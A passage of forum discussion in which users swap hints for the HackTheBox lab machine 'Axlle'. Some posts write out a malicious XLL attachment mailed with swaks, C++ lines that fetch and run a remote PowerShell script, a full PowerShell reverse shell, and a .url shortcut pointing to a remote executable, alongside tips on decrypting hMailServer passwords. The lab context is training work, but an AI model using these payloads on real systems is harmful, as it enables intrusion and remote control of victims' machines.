HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
#41
(Jun 23, 2024, 03:06 AM)markg34 Wrote:
(Jun 23, 2024, 03:02 AM)saoBFo Wrote:
(Jun 23, 2024, 02:20 AM)standby123 Wrote:
(Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

Yeah hmailer theres a decrpyt vbs in addons you can use, I modified it and decrypted the pass from the INI

https://github.com/GitMirar/hMailDatabas...dDecrypter

can be used for decrypting the encrypted blowfish password from hMailServer.INI. only the sqlserver hash is crackable.
Reply
#42
(Jun 23, 2024, 03:56 AM)saoBFo Wrote:
(Jun 23, 2024, 03:38 AM)maggi Wrote:
(Jun 23, 2024, 03:22 AM)saoBFo Wrote:
(Jun 23, 2024, 03:10 AM)standby123 Wrote:
(Jun 23, 2024, 03:02 AM)saoBFo Wrote: The hash in the hMailServer.INI is not crackable with rockyou

Hash what hash? search in C:\Program Files (x86)\hMailServer\Data


lnk in C:\inetpub\testing is not working, which type of "web shortcuts" is working for you?

 I was just about to start dropping stuff in there, what did you use as your lnk file?

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\test.lnk")
$lnk.TargetPath = "PATH to payload"
$lnk.Save()

But, this is not working..
.lnk injection i saw this in mist.htb

(Jun 23, 2024, 03:58 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:54 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:50 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:43 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:41 AM)fuckhackthebox Wrote: figured

seems to work for some but not others

done it 100 times now with no response

tried encoded ps like you suggested and still nothing

so weird
Bro maybe u need to --server 10.10.11.21 --port 25

pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

No problem bro try again tomorrow u will do it

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#43
(Jun 23, 2024, 04:04 AM)gihimlek Wrote:
(Jun 23, 2024, 03:58 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:54 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:50 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:43 AM)osamy7593 Wrote: Bro maybe u need to --server 10.10.11.21 --port 25

pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1.swaks that i've used and worked  - 

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2.powershell execution - made the rev shell work with addition of command in the xll example cpp file

system ("curl http://<IP>:<PORT>/revsh.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers
Reply
#44
(Jun 23, 2024, 04:12 AM)bmoon10 Wrote:
(Jun 23, 2024, 04:04 AM)gihimlek Wrote:
(Jun 23, 2024, 03:58 AM)fuckhackthebox Wrote:
(Jun 23, 2024, 03:54 AM)osamy7593 Wrote:
(Jun 23, 2024, 03:50 AM)fuckhackthebox Wrote: pretty sure my swaks command is okay but appreciate the sanity check

swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll

my vip ip for the box is different but ye

and that test.xll works locally

Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send

appreciate the advice man but ive done that

i even just swapped vpn regions and everything and still nothing

i give up for the night lmao

Same ....

couple of things:

1.swaks that i've used and worked  - 

swaks --to accounts@axlle.htb --from it@axlle.htb --header "Subject: ws" --body "check" --attach @ws.xll

2.powershell execution - i made it work with two steps in the cpp file

system("curl http://<IP>:<PORT>/revsh.ps1 -o %TEMP%\revsh.ps1");
system("powershell -nop -W hidden -noni -ep bypass -f %TEMP%\revsh.ps1");

revsh.ps1

$TCPClient = New-Object Net.Sockets.TCPClient('<IP>', <PORT>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Replace <IP>,<PORT> with your IP, PORT

cheers

So basically you are creating a cpp file with system commands and then attaching it to the xll file ?
Reply
#45
anyone have a tip on how to move on from gideon after finding the hmail creds?
Reply
#46
Any hint for root ? Is dll hijack for kbfiltr ?
Reply
#47
(Jun 23, 2024, 05:09 AM)maggi Wrote: anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
Reply
#48
(Jun 23, 2024, 06:32 AM)ritualist Wrote:
(Jun 23, 2024, 05:09 AM)maggi Wrote: anyone have a tip on how to move on from gideon after finding the hmail creds?

Didn't use those creds. But there is a hint in an email in the Data folder.
Something like this worked for me
$url = "file:////10.10.x.x/share/evil.exe"
$shortcutPath = "C:\inetpub\testing\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

Good looks I didn't think of that!
 I knew it was a link but I always forget I can share a share
Reply
#49
After get shell what to get user flag?
Reply
#50
(Jun 23, 2024, 07:28 AM)game95 Wrote: After get shell what to get user flag?

in C:\Program Files (x86)\hMailServer u have a some config files with password hash. Use https://github.com/GitMirar/hMailDatabas...dDecrypter for unhash the password for MSSQL database
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,778 8 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,968 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,976 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,627 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,275 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)